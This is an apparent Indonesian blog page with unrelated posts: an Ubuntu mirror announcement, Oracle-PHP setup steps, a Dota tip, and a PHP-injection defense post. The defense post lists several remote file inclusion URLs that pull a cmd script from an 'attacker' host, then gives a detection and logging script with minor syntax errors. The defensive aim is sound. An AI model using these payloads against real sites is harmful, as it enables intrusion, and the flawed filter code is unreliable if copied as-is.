Mirror Ubuntu Di Indonesia

Kabar gembira untuk para pengguna Ubuntu di Indonesia, saat ini telah meluncur mirror baru Ubuntu yang merupakan hasil usaha dari IndikaNet yang bekerja sama dengan ICT Centre Jakarta. Server mirror yang mempunyai kapasitas gigabit network ke IIX ini menyediakan repositori archive Ubuntu serta kumpulan ISO dari rilis-rilis keluarga Ubuntu. Dengan adanya alternatif server mirror baru ini maka diharapkan akan lebih mempermudah para pengguna Ubuntu di Indonesia untuk dapat menikmati keindahan Ubuntu.
Berikut ini adalah contoh sources.list untuk Anda yang ingin menggunakan repositori Ubuntu yang ada di Indika.

### sources.list.indika
### Repository dengan menggunakan server mirror ubuntu.indika.net.id
### Contoh untuk versi edgy & untuk versi lain cukup ganti aja edgy menjadi dapper atau breezy
## REPOSITORY UTAMA
deb http://ubuntu.indika.net.id/ edgy main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ edgy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://ubuntu.indika.net.id/ edgy-updates main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ edgy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://ubuntu.indika.net.id/ edgy-security main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ edgy-security main restricted universe multiverse
Satu informasi lagi seputar mirror baru Ubuntu ini, selain menggunakan alamat situs yang berada diatas. Anda dapat juga mengakses server mirror tersebut melalui alamat http://id.archive.ubuntu.com/. Hal ini adalah hadiah yang sangat baik untuk pengguna Ubuntu di Indonesia karena selama ini id.archive.ubuntu.com yang merupakan alamat default untuk akses dari Indonesia tersebut masih mengarah ke server yang ada di luar negeri dan sekarang alamat tersebut telah diarahkan ke server mirror Indika sehingga Anda dapat memperoleh akses ke repositori dengan lebih cepat. Selain itu juga ada satu alamat lagi yang telah diarahkan ke server mirror Indika, yaitu http://id.releases.ubuntu.com/, tempat untuk mendapat ISO dari keluarga Ubuntu.
Terakhir tidak lupa diucapkan banyak terima kasih kepada IndikaNet, ICT Center Jakarta, dan rekan-rekan yang telah membantu merealisasikan server mirror Ubuntu ini dan tidak lupa juga kepada para pengguna Ubuntu di Indonesia. Akhir kata selamat menikmati!

PHP Injection

Serangan web dewasa ini semakin banyak memanfaatkan vulnerabillity pada script PHP, yaitu saat seorang programmer tidak
melakukan sanitasi input pada script yang dia buat, disaat register_globals ON dan allow_fopen_url maka seorang attacker
dapat melakukan injeksi pada script PHP yang vulnerable secara remote.

Caranya yaitu dengan mengeksekusi script vulnerable dengan meng-inject melalui url dari server attacker yang telah berisi
script untuk melakukan exploitasi.
Dampak ini dapat dihilangkan dengan men-set register_globals OFF, tetapi cara ini kurang effektif karena banyak aplikasi
third party yang mengharuskan register_globals ON.

Better Solutions
``````````````````

Teknik-teknik PHP Injection yang sering digunakan oleh attacker :

1. www.target.com/main.php?r=http://attacker/cmd.jpg?&cmd= command>
2. www.target.com/main.php?r=http://attacker/cmd.gif&cmd= command>
3. www.target.com/main.php?r=http://attacker/cmd.txt\&cmd=
4. www.target.com/main.php?r=http://attacker/cmd.txt&cmd= command>
5. www.target.com/main.php?r=http://attacker/cmd.jpg?cmd= command>

dengan melihat url tersebut kita dapat mengambil kesimpulan bahwa :

1. attacker menyimpan script inject dalam bentuk extension jpg, gif, dan txt
2. attacker menggunakan variabel cmd untuk injection
3. attacker menggunakan beberapa kombinasi penghubung

Berdasarkan hal tersebut kita dapat membuat sebuah script sederhana untuk mensanitasi bentuk url yang dicurigai sebagai
bentuk PHP Injection, serta melakukan logging terhadap aktifitas dari attacker.

Ok...to the point, this the script :

sertakan script ini pada file konfigurasi aplikasi kita.

(modifikasi script/referensi dari internet via uncle google)

1.
2.
3. if (
4. ereg('gif\?cmd',$_SERVER['REQUEST_URI']) ||
5. ereg('gif&cmd',$_SERVER['REQUEST_URI']) ||
6. ereg('jpg\?cmd',$_SERVER['REQUEST_URI']) ||
7. ereg('jpg&cmd',$_SERVER['REQUEST_URI']) ||
8. ereg('txt?cmd',$_SERVER['REQUEST_URI']) ||
9. ereg('txt&cmd',$_SERVER['REQUEST_URI']) ||
10.
11. ereg('gif\?',$_SERVER['REQUEST_URI']) ||
12. ereg('gif&',$_SERVER['REQUEST_URI']) ||
13. ereg('jpg\?',$_SERVER['REQUEST_URI']) ||
14. ereg('jpg&',$_SERVER['REQUEST_URI']) ||
15. ereg('txt?',$_SERVER['REQUEST_URI']) ||
16. ereg('txt&',$_SERVER['REQUEST_URI'])
17.
18. )
19. {
20. // bagian untuk mencatat aktifitas hacking
21. // dan mengirimkan email pada administrator
22.
23. $ip = $_SERVER['REMOTE_ADDR'];
24. $date = date("m/d/Y g:i:s a");
25. $referer = $_SERVER['HTTP_REFERER'];
26. $uri = $_SERVER['REQUEST_URI']
27.
28. $fl = fopen('log.txt', 'a');
29. fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$uri."\n");
30. fclose($fl);
31. $msg = "Terdapat percobaan hacking pada server ".$_SERVER['REMOTE_ADDR']."
mencoba untuk mengeksekusi ".$_SERVER['REQUEST_URI'];
32. mail(' anstellwinkel@yahoo.com.auanstellwinkel@yahoo.com.au' ,'Percobaan hacking pada '.$_SERVER['REQUEST_URI'],$msg);
33. die('Silahkan hentikan percobaan anda!');
34. }
35.
36. ?>

penjelasan :

Baris 1 - 16 --> apabila ditemukan pola tersebut pada url maka script ini akan dieksekusi
Baris 23 - 30 --> mencatat IP address, tanggal, referer dan url yang digunakan oleh attacker serta mencatatnya pada
file log.txt
Baris 31 - 33 --> Mengirim semua aktifitas hacking ke email administrator Alamat Email inidilindungi dari bot spam, Anda Harus Mengaktifkan Javascript Untuk Melihatnya

Koneksi Oracle 10g dengan PHP di buntu

Jika dana ingin melakukan koneksi Oracle database denganPHP, dana bisa menggunakan module Oracle's Instant Client dan oci8 dari pear.
Caranya:
Download packages Basic dan the SDK Dari
http://www.oracle.com/technology/tech/oci/instantclient/instantclient.html.
yaitu instantclient-basic-linux32-10.2.0.1-20050713.zip dan instantclient-sdk-linux32-10.2.0.1-20050713.zip.
Unzip File ine ke direktori baru, contoh:. /opt/oracle/instantclient.

mkdir -p /opt/oracle/instantclient
cd /opt/oracle/instantclient
unzip instantclient-basic-linux32-10.2.0.1-20050713.zip
unzip instantclient-sdk-linux32-10.2.0.1-20050713.zip
echo /opt/oracle/instantclient >> /etc/ld.so.conf
ldconfig


Trus pake perintah


ln -s libclntsh.so.10.1 libclntsh.so
ln -s libocci.so.10.1 libocci.so


Selanjutnya download module oci8 Dengan pear.
apt-get install php-pear

Seletah itu lakukan perintah berikut

mkdir -p /usr/local/src
cd /usr/local/src
pear download oci8
tar xzf oci8-1.1.1.tgz
cd oci8-1.1.1
phpize
./configure --with-oci8=shared,instantclient,/opt/oracle/instantclient
make
make install


Untuk mengaktifkan module oci8 pada php.ini (/etc/php5/apache2/php.ini dan /etc/php5/cli/php.ini), Taruh extention berikut
extension=oci8.so

Restart apache.
Anda akan menemukan module oci8 dari phpinfo().

Tips Dota di acer 4520

Bulan Mei kemarin aku beli sebuah notebook acer 4520. Ini merupakan Notebook inceran ku. Nah karena aku seneng main dota makanya aku minta kopian file dota sama temen. tapi setelah main sekitar 20 menit keluar error yang menyatakan ada error pada soundcardnya trus bluescreen dan restart dech.. DAlam hati sialllll... Nah pertama saya kira karena filenya kopian. Selanjutnya saya coba untuk meng-instalnya, tapi error tersebut masih muncul. Dengan rasa Penasaran saya cek di setting sound di dota, ternyata di sound providernya yang terpilih adalah creative lab, nah saya mulai sadar notebook ku kan ndak make chipset creative yang dipake nvidia dengan dukungan dolby, dan ternyata di providenya terdapat yang namanya mas dolby ini, saya coba pilih mas yang satu ini dan sampai sekarang error tersebut tidak muncul lagi, untuk jelasnya liat gambar di bawah ,lets.. enjoy....